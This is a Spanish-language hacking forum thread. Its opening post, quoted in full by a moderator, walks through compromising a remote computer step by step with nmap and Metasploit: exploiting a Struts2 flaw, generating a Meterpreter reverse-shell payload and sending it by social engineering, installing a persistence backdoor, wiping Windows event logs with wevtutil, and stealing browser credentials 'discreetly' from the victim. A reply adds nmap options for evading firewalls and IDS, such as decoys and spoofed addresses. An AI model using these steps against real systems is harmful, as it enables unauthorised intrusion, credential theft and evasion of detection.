Hacking Remoto: Un vistazo general a la metodología del control remoto


ankitbinary

Miembro muy activo
Este tutorial proporciona información general sobre las etapas y técnicas involucradas en el hacking remoto de un sistema informático. Sirve como una introduccion a las tácticas para comprometer un sistema:

La verdad no se como hacen para que salga lo de "Debes responder y dar like al contenido oculto antes de poder visualizarlo." pero seria de ayuda y me motivaria a publicar mas tutoriales como estos

Paso 1:
Escaneo de puertos
Utiliza una herramienta como Nmap para escanear los puertos abiertos en la computadora objetivo. Este paso te permitirá identificar posibles puntos de entrada al sistema. Remplaza "IP_objetivo" por la direccion IP de la computadora que deseas escanear

nmap -p- IP_objetivo

Este comando explorará todos los puertos posibles (1-65535) en la computadora objetivo y te mostrará cuáles están abiertos.

Paso 2:
Identificacion de vulnerabilidades
Una vez que hayas identificado los puertos abiertos, utiliza Metasploit u otras herramientas similares para buscar vulnerabilidades conocidas en el sistema objetivo. Estas vulnerabilidades pueden ser explotadas para obtener acceso al sistema. Inicia Metasploit ejecutando el siguiente comando:

msfconsole

una vez cargado utiliza el siguiente comando "search" seguido del nombre del servicio asociado al puerto abierto que encontraste en el escaneo de
Nmap. Por ejemplo, si el puerto abierto es 80 y el servicio es HTTP escribe lo siguiente:

search http


Esto revelará una lista de exploits. Para elegir un exploit, escribe el comando "use", seguido del nombre del exploit:

use exploit/multi/http/struts2_content_type_ognl

Configura el exploit con la dirección IP y el puerto objetivo:

set RHOSTS IP_objetivo y set RPORT Puerto_objetivo

para ver si hay más opciones que debes configurar para el exploit seleccionado utiliza el siguiente comando:

show options

Cuando hayas configurado todas las opciones necesarias ya puedes intentar explotar la vulnerabilidad en el sistema objetivo 💀:

exploit

Paso 3:
Seleccion del exploit y creacion del payload
Después de explotar con éxito una vulnerabilidad en el sistema objetivo, debes crear un payload que te permita controlar el sistema de forma remota. Busca un payload compatible con tu exploit y el sistema objetivo. Por ejemplo, si estás apuntando a un sistema Windows, busca un payload de Meterpreter para Windows:

search meterpreter

luego

use payload/windows/meterpreter/reverse_tcp

Configura las opciones necesarias para el payload. LHOST y LPORT, son la dirección IP y el puerto de escucha en tu propia máquina

set LHOST tu_IP y set LPORT puerto_escucha

Genera el payload y guardalo en un archivo especifico, yo en mi caso lo llamare payload.exe pero tu lo puedes llamar como quieras

generate -f payload.exe

Envía el payload al sistema objetivo utilizando métodos como el correo electrónico, la ingeniería social o cualquier otra forma de entregar el archivo. 💀

Paso 4:
Establecimiento de persistencia
Mantener el acceso y cubrir tus huellas🐾. Una vez que hayas comprometido el sistema y establecido el control remoto, es posible que desees mantener el acceso al sistema para futuras actividades. Para hacer esto, puedes instalar una puerta trasera (backdoor)🚪 en el sistema objetivo. Una puerta trasera es una forma de acceder al sistema sin que se detecte y sin tener que explotar la vulnerabilidad nuevamente.


En Metasploit, busca un módulo de post-explotación adecuado para instalar una puerta trasera:

search post/windows/manage

Selecciona el módulo de post-explotación "persistence" para mantener el acceso:

use post/windows/manage/persistence

Configura las opciones necesarias, como RHOSTS (IP objetivo), LHOST (tu IP) y LPORT (puerto de escucha):

set RHOSTS IP_objetivo set LHOST tu_IP set LPORT puerto_escucha

Ejecuta el módulo de post-explotación para instalar la puerta trasera:

run

Después de instalar la puerta trasera, asegúrate de cubrir tus huellas borrando cualquier rastro de tus actividades en el sistema. Esto puede incluir eliminar archivos temporales, borrar registros y eliminar cualquier otro indicio que pueda revelar tu presencia en el sistema.

Paso 5:
Ocultar huellas
Cubre tus huellas para evitar ser detectado. Esto puede incluir la eliminación de registros de eventos, archivos temporales y otros rastros que puedan llevar a tu identificación. Utiliza herramientas y comandos específicos para borrar registros de eventos en el sistema objetivo. Por ejemplo, en un sistema Windows, podrías usar el comando "wevtutil":

wevtutil cl Application
wevtutil cl Security
wevtutil cl System

Paso 6:
Recopilación de datos
Con acceso al sistema, ahora puedes recopilar datos valiosos, como contraseñas, información personal y otros datos sensibles. Asegúrate de hacerlo de manera discreta para no alertar a la víctima.

1. Uso del módulo "credentials" en Metasploit:
para buscar y almacenar credenciales carga el modulo "credentials"

msfconsole

busca módulos de post-explotación relacionados con la recopilación de credenciales con el comando "search". Por ejemplo:

search post/windows/gather Aquí, estamos buscando módulos de post- explotación específicos para sistemas Windows que estén relacionados con la recopilación de datos.
Por ejemplo, para recopilar contraseñas almacenadas en navegadores web, podrías utilizar el módulo "enum_chrome":

use post/windows/gather/enum_chrome
Comprueba las opciones disponibles:
show options

Configura las opciones necesarias, como SESSION, que indica la sesión de Meterpreter en la que estás trabajando:
set SESSION <id_de_sesion>

ejecuta el modulo:
run
El módulo comenzará a buscar y recopilar las credenciales almacenadas en el sistema objetivo. Dependiendo del módulo que estés utilizando, los datos recopilados pueden incluir contraseñas almacenadas, hashes de contraseñas, cookies

Además, puedes buscar archivos que contengan información confidencial o personal navegando por los directorios del sistema y copiando cualquier archivo relevante a tu máquina local.


Por favor les invito a corregirme o hacer preguntas o agregar algo, ya especifique es esto es muy general y lo he hecho un poco cansado para aportar a la comunidad 👍
 

Dark

🔥root313🔥
Staff
Moderador
Paladín de Nodo
Jinete de Nodo
Burgués de Nodo
Noderador
Nodero
Noder Pro
Noder
Este tutorial proporciona información general sobre las etapas y técnicas involucradas en el hacking remoto de un sistema informático. Sirve como una introduccion a las tácticas para comprometer un sistema:

La verdad no se como hacen para que salga lo de "Debes responder y dar like al contenido oculto antes de poder visualizarlo." pero seria de ayuda y me motivaria a publicar mas tutoriales como estos

Paso 1:
Escaneo de puertos
Utiliza una herramienta como Nmap para escanear los puertos abiertos en la computadora objetivo. Este paso te permitirá identificar posibles puntos de entrada al sistema. Remplaza "IP_objetivo" por la direccion IP de la computadora que deseas escanear

nmap -p- IP_objetivo

Este comando explorará todos los puertos posibles (1-65535) en la computadora objetivo y te mostrará cuáles están abiertos.

Paso 2:
Identificacion de vulnerabilidades
Una vez que hayas identificado los puertos abiertos, utiliza Metasploit u otras herramientas similares para buscar vulnerabilidades conocidas en el sistema objetivo. Estas vulnerabilidades pueden ser explotadas para obtener acceso al sistema. Inicia Metasploit ejecutando el siguiente comando:

msfconsole

una vez cargado utiliza el siguiente comando "search" seguido del nombre del servicio asociado al puerto abierto que encontraste en el escaneo de
Nmap. Por ejemplo, si el puerto abierto es 80 y el servicio es HTTP escribe lo siguiente:

search http


Esto revelará una lista de exploits. Para elegir un exploit, escribe el comando "use", seguido del nombre del exploit:

use exploit/multi/http/struts2_content_type_ognl

Configura el exploit con la dirección IP y el puerto objetivo:

set RHOSTS IP_objetivo y set RPORT Puerto_objetivo

para ver si hay más opciones que debes configurar para el exploit seleccionado utiliza el siguiente comando:

show options

Cuando hayas configurado todas las opciones necesarias ya puedes intentar explotar la vulnerabilidad en el sistema objetivo 💀:

exploit

Paso 3:
Seleccion del exploit y creacion del payload
Después de explotar con éxito una vulnerabilidad en el sistema objetivo, debes crear un payload que te permita controlar el sistema de forma remota. Busca un payload compatible con tu exploit y el sistema objetivo. Por ejemplo, si estás apuntando a un sistema Windows, busca un payload de Meterpreter para Windows:

search meterpreter

luego

use payload/windows/meterpreter/reverse_tcp

Configura las opciones necesarias para el payload. LHOST y LPORT, son la dirección IP y el puerto de escucha en tu propia máquina

set LHOST tu_IP y set LPORT puerto_escucha

Genera el payload y guardalo en un archivo especifico, yo en mi caso lo llamare payload.exe pero tu lo puedes llamar como quieras

generate -f payload.exe

Envía el payload al sistema objetivo utilizando métodos como el correo electrónico, la ingeniería social o cualquier otra forma de entregar el archivo. 💀

Paso 4:
Establecimiento de persistencia
Mantener el acceso y cubrir tus huellas🐾. Una vez que hayas comprometido el sistema y establecido el control remoto, es posible que desees mantener el acceso al sistema para futuras actividades. Para hacer esto, puedes instalar una puerta trasera (backdoor)🚪 en el sistema objetivo. Una puerta trasera es una forma de acceder al sistema sin que se detecte y sin tener que explotar la vulnerabilidad nuevamente.


En Metasploit, busca un módulo de post-explotación adecuado para instalar una puerta trasera:

search post/windows/manage

Selecciona el módulo de post-explotación "persistence" para mantener el acceso:

use post/windows/manage/persistence

Configura las opciones necesarias, como RHOSTS (IP objetivo), LHOST (tu IP) y LPORT (puerto de escucha):

set RHOSTS IP_objetivo set LHOST tu_IP set LPORT puerto_escucha

Ejecuta el módulo de post-explotación para instalar la puerta trasera:

run

Después de instalar la puerta trasera, asegúrate de cubrir tus huellas borrando cualquier rastro de tus actividades en el sistema. Esto puede incluir eliminar archivos temporales, borrar registros y eliminar cualquier otro indicio que pueda revelar tu presencia en el sistema.

Paso 5:
Ocultar huellas
Cubre tus huellas para evitar ser detectado. Esto puede incluir la eliminación de registros de eventos, archivos temporales y otros rastros que puedan llevar a tu identificación. Utiliza herramientas y comandos específicos para borrar registros de eventos en el sistema objetivo. Por ejemplo, en un sistema Windows, podrías usar el comando "wevtutil":

wevtutil cl Application
wevtutil cl Security
wevtutil cl System

Paso 6:
Recopilación de datos
Con acceso al sistema, ahora puedes recopilar datos valiosos, como contraseñas, información personal y otros datos sensibles. Asegúrate de hacerlo de manera discreta para no alertar a la víctima.

1. Uso del módulo "credentials" en Metasploit:
para buscar y almacenar credenciales carga el modulo "credentials"

msfconsole

busca módulos de post-explotación relacionados con la recopilación de credenciales con el comando "search". Por ejemplo:

search post/windows/gather Aquí, estamos buscando módulos de post- explotación específicos para sistemas Windows que estén relacionados con la recopilación de datos.
Por ejemplo, para recopilar contraseñas almacenadas en navegadores web, podrías utilizar el módulo "enum_chrome":

use post/windows/gather/enum_chrome
Comprueba las opciones disponibles:
show options

Configura las opciones necesarias, como SESSION, que indica la sesión de Meterpreter en la que estás trabajando:
set SESSION <id_de_sesion>

ejecuta el modulo:
run
El módulo comenzará a buscar y recopilar las credenciales almacenadas en el sistema objetivo. Dependiendo del módulo que estés utilizando, los datos recopilados pueden incluir contraseñas almacenadas, hashes de contraseñas, cookies

Además, puedes buscar archivos que contengan información confidencial o personal navegando por los directorios del sistema y copiando cualquier archivo relevante a tu máquina local.


Por favor les invito a corregirme o hacer preguntas o agregar algo, ya especifique es esto es muy general y lo he hecho un poco cansado para aportar a la comunidad 👍
Buen aporte, sigue así.
 

M͇4Đ₦35

Leaaak my ballsss ( ͡° ͜ʖ ͡°)
Nodero
Noder
Tus huevos sigue subiendo cositas asii pk 10/10. si subes alguna fotoo o video/gif paraa ir enseñando ya sería la polla
 

destapeman

FUCK PUSSYS, YES BADASS
Moderador
Paladín de Nodo
Jinete de Nodo
Burgués de Nodo
Noderador
Nodero
Noder
grande, muy buen post.

pero a la hora de hacer el discover con nmap te aconsejo que lo hagas con alguno de los parámetros que camuflan el escaneo, porque lo más seguro es que algún IPS/IDS, XDR/EDR o FW de NG lo va a detectar por ende, bloquear.

Sacado del man de nmap:

Bash:
EVASIÓN Y FALSIFICACIÓN PARA CORTAFUEGOS/IDS:
  -f; --mtu <valor>: fragmentar paquetes (opc. con el MTU indicado)
  -D <señuelo1,señuelo2[,ME],...>: Disimular el análisis con señuelos
     N. del T.: «ME» es «YO» mismo.
  -S <Dirección_IP>: Falsificar la dirección IP origen
  -e <interfaz>: Utilizar la interfaz indicada
  -g/--source-port <numpuerto>: Utilizar el número de puerto dado
  --data-length <num>: Agregar datos al azar a los paquetes enviados
  --ttl <val>: Fijar el valor del campo time-to-live (TTL) de IP
  --spoof-mac <dirección mac/prefijo/nombre de fabricante>: Falsificar la dirección MAC
  --badsum: Enviar paquetes con una suma de comprobación TCP/UDP falsa
 
  • Like
Reacciones : ankitbinary